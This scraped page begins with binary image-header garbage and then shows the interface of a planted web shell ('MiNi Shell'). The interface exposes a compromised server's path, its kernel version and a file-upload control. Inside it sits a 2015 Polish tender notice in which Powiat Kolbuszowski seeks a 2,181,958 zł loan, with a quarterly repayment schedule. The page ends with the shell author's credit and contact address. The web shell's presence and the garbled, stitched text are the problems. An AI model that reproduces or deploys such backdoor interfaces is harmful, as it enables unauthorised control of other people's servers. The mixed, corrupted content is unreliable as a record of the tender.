JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151008/266666-N-2015.html

<p class="kh_header"><b>Kolbuszowa: Zaciągnięcie kredytu przez Powiat Kolbuszowski w wysokości 2 181 958 zł</b><br>
<b>Numer ogłoszenia: 266666 - 2015; data zamieszczenia: 08.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kolbuszowski , ul. 11 Listopada 10, 36-100 Kolbuszowa, woj. podkarpackie, tel. 17 2275880, faks 17 2271523.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.powiat.kolbuszowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaciągnięcie kredytu przez Powiat Kolbuszowski w wysokości 2 181 958 zł.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaciągniecie  kredytu przez Powiat Kolbuszowski w wysokości 2 181 958 zł.  z przeznaczeniem:
1)	Spłatę wcześniej zaciągniętych zobowiązań z tytułu kredytów i pożyczek zaciągniętych w latach ubiegłych w wysokości 1 000 000 zł.
2)	 Wyprzedzające finansowanie działań finansowanych ze środków pochodzących z budżetu Unii Europejskiej 1 181 958 zł. w całości na finasowanie wydatków Projektu pn. Uzbrojenie terenów inwestycyjnych przy ul. Leśnej i Żytniej w Kolbuszowej.Zgodnie z umową o dofinansowanie indywidualnego projektu kluczowego w ramach osi priorytetowych I - VII Regionalnego Programu Operacyjnego Województwa podkarpackiego na lata 2007 - 2013 z dnia  10.09.2015r. - w tym na finansowanie planowanego deficytu budżetu - 456 370 zł.

3)	Spłata kredytu nastąpi w 52 ratach kwartalnych płatnych począwszy od m-ca września 2016 r. do m-ca czerwca 2029 r. 
     Harmonogram spłaty kapitału przedstawia się następująco:

-      I rata w kwocie                                5 000,-zł      do 30.09.2016r.

-   I I rata  w kwocie            1 181 958,-zł     do 31.12.2016r.
-	III rata w kwocie	          5 000,-zł     do 31.03.2017r.
-	IV rata w kwocie	          5 000,-zł     do 30.06.2017r.
-	V rata w kwocie	          5 000,-zł     do 30.09.2017r.
-	VI rata w kwocie                 5 000,-zł     do 31.12.2017r.
-	VII rata w kwocie                5 000,-zł     do 31.03.2018r.
-	VIII rata w kwocie               5 000,-zł     do 30.06.2018r.
-	IX rata w kwocie                 5 000,-zł     do 30.09.2018r.
-	X rata w kwocie                  5 000,-zł     do 31.12.2018r.
-	XI rata w kwocie                  5 000,-zł     do 30.03.2019r.
-	XII rata w kwocie                5 000,-zł     do 30.06.2019r.
-	XIII rata w kwocie              5 000,-zł     do 30.09.2019r.
-	XIV rata w kwocie             5 000,-zł     do 31.12.2019r.
-	XV rata w kwocie               25 000,-zł     do 31.03.2020r.
-	XVI rata w kwocie              25 000,-zł     do 30.06.2020r.
-	XVII rata w kwocie              25 000,-zł     do 30.09.2020r.
-	XVIII rata w kwocie             25 000,-zł     do 31.12.2020r.
-	XIX rata w kwocie              25 000,-zł     do 31.03.2021r.
-	XX rata w kwocie               25 000,-zł     do 30.06.2021r.
-	 XXI rata w kwocie             25 000,-zł     do 30.09.2021r.
-	XXII rata w kwocie            25 000,-zł     do 31.12.2021r.
-	XXIII rata w kwocie            25 000,-zł     do 31.03.2022r.
-	XXIV rata w kwocie           25 000,-zł     do 30.06.2022r.
-	XXV rata w kwocie             25 000,-zł     do 30.09.2022r.
-	XXVI rata w kwocie            25 000,-zł     do 31.12.2022r.
-	XXVII rata w kwocie          25 000,-zł     do 31.03.2023r.
-	XXVIII rata w kwocie         25 000,-zł     do 30.06.2023r.
  - XXIX rata w kwocie           25 000,-zł     do 30.09.2023r.
 - XXX rata w kwocie             25 000,-zł     do 31.12.2023r.
  - XXXI rata w kwocie           25 000,-zł     do 31.03.2024r.
 - XXXII rata w kwocie          25 000,-zł     do 30.06.2024r.
- XXXIII rata w kwocie         25 000,-zł     do 30.09.2024r.
  - XXIV rata w kwocie           25 000,-zł     do 31.12.2024r.
   -XXXV rata w kwocie         25 000,-zł     do 31.03.2025r.
   - XXXVI rata w kwocie        25 000,-zł     do 30.06.2025r.
    - XXXVII rata w kwocie        25 000,-zł     do 30.09.2025r.
     - XXXVIII rata w kwocie         25 000,-zł     do 31.12.2025r.
     -XXXIX rata w kwocie            25 000,-zł     do 31.03.2026r.
       -XL rata w kwocie  	      	25 000,-zł     do 30.06.2026r.
    - XLI rata w kwocie              	25 000,-zł     do 30.09.2026r.
	-XLII rata w kwocie              	25 000,-zł     do 31.12.2026r.
	-XLIII rata w kwocie          	25 000,-zł     do 31.03.2027r.
	-XLIV rata w kwocie            	25 000,-zł     do 30.06.2027r.
   -XLV rata w kwocie            	25 000,-zł     do 30.09.2027r.
			-XLVI rata w kwocie           	25 000,-zł     do 31.12.2027r.
-XLVII rata w kwocie            25 000,-zł     do 31.03.2028r.
-XLVIII rata w kwocie           25 000,-zł     do 30.06.2028r.
-XLIX rata w kwocie              25 000,-zł     do 30.09.2028r.
-L rata w kwocie                     25 000,-zł     do 31.12.2028r.
-LI rata w kwocie                 	25 000,-zł     do 31.03.2029r.
-LII rata w kwocie              	10 000,-zł     do 30.06.2029r.




4)	zabezpieczeniem spłaty kredytu będzie: weksel in blanco wraz z deklaracją wekslową, 
5)	odsetki naliczone będą od kwoty wykorzystanego kredytu,
6)	kapitalizacja odsetek jest niedopuszczalna,
7)	w sytuacji wcześniejszej niż w umowie spłaty kredytu ( przedterminowo) odsetki
naliczane od faktycznego zadłużenia ( bez ponoszenia dodatkowych kosztów),
8)	oprocentowanie będzie liczone wg stawki zmiennej obowiązującej w okresie
naliczania w wysokości zmiennej stopy podstawowej równej stawce WIBOR dla 
depozytów 3  miesięcznych powiększonej o marżę banku,
a)	przy naliczaniu oprocentowania będzie przyjęta rzeczywista liczba dni w miesiącu oraz w roku obrachunkowym (365/366 dni),
b)	o zmianie oprocentowania Bank powiadomi kredytobiorcę na piśmie,
9)	marża banku nie może mieć wartości ujemnej,
10)	 kredyt zostanie uruchomiony na wniosek zamawiającego w transzach w wysokościach określonych we wniosku o uruchomienie kredytu w zależności od potrzeb zamawiającego. Zamawiający ustala maksymalny termin uruchomienia transzy kredytu - 3 dni robocze od dnia przekazania dyspozycji.
11)	spłata odsetek w kwartalnych okresach obrachunkowych,
12)	raty odsetkowe i kapitałowe będą płatne do końca każdego kwartału,
      13) Zamawiający zastrzega sobie prawo do wykorzystania części przyznanego kredytu
           oraz prawo do wcześniejszej spłaty kredytu  bez ponoszenia  dodatkowych kosztów.  14) Zamawiający dopuszcza stosowanie opłat i prowizji z tytułu: oprocentowania kredytu    
           oraz prowizji przygotowawczej (za udzielenie kredytu); inne opłaty i prowizje np:   
 prowizja od  zaangażowania, prowizja za wcześniejszą spłatę kredytu są niedopuszczone.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert wadium 
w wysokości: 10 000 zł.( dziesięć tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie  spełniony  jeżeli  Wykonawca  wykaże,  że  posiada  uprawnienia  do wykonywania  czynności  bankowych  zgodnie  z  ustawą  z  29  sierpnia  1997  r.  Prawo bankowe  tj.  Dz.  U.  z  2012  r.,  poz.  1376  z  późn.  zm, lub inny dokument upoważniający do wykonywania czynności bankowych wydany przez właściwy organ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp. zgodnie z załącznikiem nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp. zgodnie z załącznikiem nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp. zgodnie z załącznikiem nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp. zgodnie z załącznikiem nr 1 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin uruchomienia transzy kredytu - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmiany umowy kredytowej:
1) w przypadku wystąpienia okoliczności  wynikających z możliwości płatniczych Zamawiającego:
a)  w zakresie zmiany harmonogramu spłat z zachowaniem okresu kredytowania.
b) możliwość wcześniejszej  spłaty części lub całości kredytu z zastrzeżeniem, że Zamawiający nie będzie obciążony dodatkowymi opłatami z tego tytułu a odsetki naliczane będą tylko od kwoty aktualnego zadłużenia pozostałego do spłaty.
c)możliwość wykorzystana części przyznanego kredytu. W takim przypadku bank nie obciąży Zamawiającego(kredytobiorcy) kosztami nie pobranego kredytu. 
2)w przypadku wejścia Polski do strefy euro kredyt zostanie przewalutowany bez  dodatkowych opłat.
3)W szczególnie uzasadnionych przypadkach dopuszcza się zmiany postanowień umowy , w związku z wystąpieniem okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego. 
4) zmiana przedstawicieli stron - osób podpisujących umowę, innych przedstawicieli  - w przypadku niemożności pełnienia przez nich powierzonych funkcji (np. zdarzenia losowe, zmiana pracy, rezygnacja itp.) 
5) zmiana podwykonawcy lub rezygnacja z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Jeżeli zmiana dotyczy podmiotu trzeciego/podwykonawcy, na zasobach, którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu. Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowy podmiot.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.kolbuszowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Kolbuszowski, ul .11-go Listopada 10, 36-100 Kolbuszowa, pok. 401.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2015 godzina 11:00, miejsce: Powiat Kolbuszowski, ul .11-go Listopada 10, 36-100 Kolbuszowa, pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com